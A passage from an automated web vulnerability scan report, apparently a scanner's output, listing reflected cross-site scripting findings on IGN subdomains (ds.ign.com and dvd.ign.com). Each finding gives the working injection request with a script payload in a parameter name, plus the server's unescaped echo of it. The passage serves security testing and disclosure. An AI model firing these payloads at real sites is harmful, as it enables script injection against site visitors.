Expires: Mon, 07 Feb 2011 01:21:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18145-1862347009-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:20 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041680683v-1n-12mc+1297041680683mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 172490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>New Nintendo DS &
...[SNIP]...
typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/reviews.html?52616"-alert(1)-"17261e88bc1=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.167. http://ds.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d64e7"><script>alert(1)</script>8545307439b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/reviews.html?d64e7"><script>alert(1)</script>8545307439b=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32464-1113793781-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:18 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041678854v-1n-12mc+1297041678854mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 172553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>New Nintendo DS &
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/reviews.html?d64e7"><script>alert(1)</script>8545307439b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.168. http://ds.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/upcoming.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef322"><script>alert(1)</script>9008801a361 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/upcoming.html?ef322"><script>alert(1)</script>9008801a361=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c08-31243-1766585205-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:38 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041698841v-1n-12mc+1297041698841mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 150837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>New Nintendo DS &
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/upcoming.html?ef322"><script>alert(1)</script>9008801a361=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.169. http://ds.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/upcoming.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33a4e"-alert(1)-"0edb7c69d16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/upcoming.html?33a4e"-alert(1)-"0edb7c69d16=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18145-181493938-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:48 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041708767v-1n-12mc+1297041708767mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 149063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>New Nintendo DS &
...[SNIP]...
ypeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/upcoming.html?33a4e"-alert(1)-"0edb7c69d16=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.170. http://ds.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/videos.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8eb3"><script>alert(1)</script>721f950aac5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/videos.html?c8eb3"><script>alert(1)</script>721f950aac5=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-26954-1317642609-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:47 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041707435v-1n-12mc+1297041707435mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 112882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DS: Games, Che
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/videos.html?c8eb3"><script>alert(1)</script>721f950aac5=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.171. http://ds.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/videos.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c60d1"-alert(1)-"123e4cb45b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/videos.html?c60d1"-alert(1)-"123e4cb45b9=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15003-360702473-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:50 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041710275v-1n-12mc+1297041710275mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 112814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DS: Games, Che
...[SNIP]...
(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/videos.html?c60d1"-alert(1)-"123e4cb45b9=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.172. http://ds.ign.com/objects/059/059687.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /objects/059/059687.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e07f8"><script>alert(1)</script>136d9961b03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /objects/059/059687.html?e07f8"><script>alert(1)</script>136d9961b03=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 118399
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=2970f7kbs53pj;Path=/includes
Set-Cookie: freq=c-1297043278645v-1n-12mc+1297043278645mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-27365-1401115047-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:47:58 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Expires: Mon, 07 Feb 2011 01:47:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:47:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN: Pokemon Black
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/objects/059/059687.html?e07f8"><script>alert(1)</script>136d9961b03=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.173. http://ds.ign.com/objects/059/059687.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /objects/059/059687.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82a09"-alert(1)-"18ec3e4fdb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /objects/059/059687.html?82a09"-alert(1)-"18ec3e4fdb2=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 120076
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=3fvn4u7p2noep;Path=/includes
Set-Cookie: freq=c-1297043289591v-1n-12mc+1297043289591mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-1825-729123278-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:48:09 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Expires: Mon, 07 Feb 2011 01:48:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:48:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN: Pokemon Black
...[SNIP]...
f _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/objects/059/059687.html?82a09"-alert(1)-"18ec3e4fdb2=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.174. http://dvd.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dvd.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d18b7"><script>alert(1)</script>d701efb97e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d18b7"><script>alert(1)</script>d701efb97e5=1 HTTP/1.1
Host: dvd.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:49:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:49:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c08-31833-974111085-8;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:49:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043380824v-1n-12mc+1297043380824mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 142990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DVD: Trailers,
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://dvd.ign.com/?d18b7"><script>alert(1)</script>d701efb97e5=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.175. http://dvd.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dvd.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98877"-alert(1)-"62dc08d6dae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?98877"-alert(1)-"62dc08d6dae=1 HTTP/1.1
Host: dvd.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:49:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:49:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-24874-1201846334-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:49:43 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043383679v-1n-12mc+1297043383679mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 142931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DVD: Trailers,
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://dvd.ign.com/?98877"-alert(1)-"62dc08d6dae=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.176. http://dvd.ign.com/index/release.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dvd.ign.com
Path:   /index/release.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d26b"-alert(1)-"5d785c7f042 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/release.html?6d26b"-alert(1)-"5d785c7f042=1 HTTP/1.1
Host: dvd.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:50:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:50:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15003-1001102404-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:13 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043413934v-1n-12mc+1297043413934mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=fdgaqjdz72i3;Path=/indx
Set-Cookie: JSESSIONID=3qsvk7ar2sowh;Path=/indx
Set-Cookie: JSESSIONID=1029h8uslvbal;Path=/indx
Content-Length: 222290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DVD: Trailers,
...[SNIP]...
ypeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://dvd.ign.com/index/release.html?6d26b"-alert(1)-"5d785c7f042=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.177. http://dvd.ign.com/index/release.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dvd.ign.com
Path:   /index/release.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 272ae"><script>alert(1)</script>2d5abbeb6e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/release.html?272ae"><script>alert(1)</script>2d5abbeb6e2=1 HTTP/1.1
Host: dvd.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:50:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:50:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c08-32430-1003246332-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:50:07 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043407204v-1n-12mc+1297043407204mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=1yxvkyx552l5q;Path=/indx
Set-Cookie: JSESSIONID=f4octo3p73bns;Path=/indx
Set-Cookie: JSESSIONID=60b9bm0j3f2sg;Path=/indx
Content-Length: 222502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DVD: Trailers,
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://dvd.ign.com/index/release.html?272ae"><script>alert(1)</script>2d5abbeb6e2=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.178. http://dvd.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dvd.ign.com
Path:   /index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b642f"-alert(1)-"3e53dda3679 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/reviews.html?b642f"-alert(1)-"3e53dda3679=1 HTTP/1.1
Host: dvd.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:49:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:49:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-24874-1999751353-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:49:05 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043345779v-1n-12mc+1297043345779mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 110402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DVD: Trailers,
...[SNIP]...
ypeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://dvd.ign.com/index/reviews.html?b642f"-alert(1)-"3e53dda3679=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.179. http://dvd.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dvd.ign.com
Path:   /index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0437"><script>alert(1)</script>5e965407bab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/reviews.html?e0437"><script>alert(1)</script>5e965407bab=1 HTTP/1.1
Host: dvd.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:48:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:48:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-19323-301783746-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:48:58 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043338712v-1n-12mc+1297043338712mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 110462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DVD: Trailers,
...[SNIP]...
